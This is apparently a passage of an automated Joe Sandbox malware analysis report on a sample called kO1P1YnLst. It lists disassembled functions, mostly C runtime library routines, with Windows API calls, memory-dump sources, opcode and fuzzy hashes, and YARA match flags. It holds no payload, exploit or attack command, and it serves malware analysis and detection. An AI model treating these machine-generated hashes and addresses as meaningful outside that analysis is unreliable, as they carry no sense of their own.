Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 05BF69A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05BF6BF7,00000001,00000001,?), ref: 05BF6A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05BF6BF7,00000001,00000001,?,?,?,?), ref: 05BF6A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05BF6B80
__freea.LIBCMT ref: 05BF6B8D

Part of subcall function 05BF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BF7CDE

__freea.LIBCMT ref: 05BF6B96
__freea.LIBCMT ref: 05BF6BBB

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: 15f17456f62fbe8823e21d362facd1a4149d6be0e07701c036248268128c76fb
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: EF51D272700216ABEB258F64CC86EBB77AAEB44750F1446A8FE05D7141EB34FC48C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05BF1CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 05BF1CFF
__cftoe.LIBCMT ref: 05BF1D31

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: 15a2af3e862d935211ab201eafc07dbb932b04259583f76b3ca92f58d51ff983
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 4D513736A04605EBDF249F6CCC49EBE77B9FF49360F104A99EA15A6181DB31F508CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 05BECC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05BECC19,05BEA4C2), ref: 05BECC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05BECC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05BECC57
SetLastError.KERNEL32(00000000,?,05BECC19,05BEA4C2), ref: 05BECCA9

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: a6368c75f3009e06738f8118a6ab93afd225e56cefe028ea76b7faa97430463b
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: 450128323493115EAB292F74BD8CA6B2F55FB0067272402FDE225A02F0EF616C1041C8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 05BF6F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
_free.LIBCMT ref: 05BF6FB7
_free.LIBCMT ref: 05BF6FDF
SetLastError.KERNEL32(00000000), ref: 05BF6FEC
SetLastError.KERNEL32(00000000), ref: 05BF6FF8
_abort.LIBCMT ref: 05BF6FFE

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: 06e8ebd0215eed459c9f58f8b4547ae017bd398f3996df76cee0d392f7307712
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: 93F0A435748A1136D7222B796C0DF6B272AEBC17B1F6501E4FF15E2290EE21AC0E4369

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 05BE1AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 05BE1B30
std::system_error::system_error.LIBCPMT ref: 05BE1B3F

Strings

ios_base::failbit set, xrefs: 05BE1B02, 05BE1B39
ios_base::eofbit set, xrefs: 05BE1B07
ios_base::badbit set, xrefs: 05BE1AF7, 05BE1B18

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: 44062642a0162139deac6f4bba70255e425781cbaf92b7798f73465ceb3030d9
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: C5F0F671A0031DB7CB10AAA88C49FEA7B9CDF09690F39C0A5FD4566180E7B57D04C2E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::eofbit set, xrefs: 004018A0

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

mscoree.dll, xrefs: 00413A85
CorExitProcess, xrefs: 00413A97

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 05BFABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: be1e71b7c60e3be55c215f4c6d300300ba5c5a092f555b8d491f5b831141907d
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 2B71B635A042169FCF39CF58CC84ABFBB7AFF45311F2841A9EA1967150D770A949C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 05BF52CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 05BF533C
_free.LIBCMT ref: 05BF535C

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 63469c03c2c5693f20b592f827dc423139d06911bd67c55760e1c37c465ea5b9
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 1941D136A00204AFCB24DF78C884A6DB7F6FF85314B1545A9D656EB290DB71B909CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 05BFE66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 05BFE673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05BFE696

Part of subcall function 05BF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BF7CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05BFE6BC
_free.LIBCMT ref: 05BFE6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05BFE6DE

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: 34c0e964c2faf7245b29b4fe0f7f627a9fda9681534273726bbfa90d9b04f639
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: E101D47270521D7F277116BA5C8CC7B7A6DEAC2AA171401B9FF05D2120DE61EC06D3B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 05BF7004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,05BF25ED,05BF7307,?,05BF6FAE,00000001,00000364,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF7009
_free.LIBCMT ref: 05BF703E
_free.LIBCMT ref: 05BF7065
SetLastError.KERNEL32(00000000), ref: 05BF7072
SetLastError.KERNEL32(00000000), ref: 05BF707B

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 32f01a511ae2aee0889281f98bdb1fbff493ae256660b42b6f637e4de6f8fc31
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: A401F97674460137973267796C88E7F222BEFC127072001F4FB16A2290EF21A80E4365

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 05BF5519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05BF5537

Part of subcall function 05BF6501: HeapFree.KERNEL32(00000000,00000000,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?), ref: 05BF6517
Part of subcall function 05BF6501: GetLastError.KERNEL32(?,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?,?), ref: 05BF6529

_free.LIBCMT ref: 05BF5549
_free.LIBCMT ref: 05BF555C
_free.LIBCMT ref: 05BF556D
_free.LIBCMT ref: 05BF557E

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 5366f3849662ec43df5e2237ae3d9d44e8674300022a387dde91651c21ce4985
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 6FF030B0911115ABCF37AF58FC446153761FB0461031275AEF60462278CF3667958FCA

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
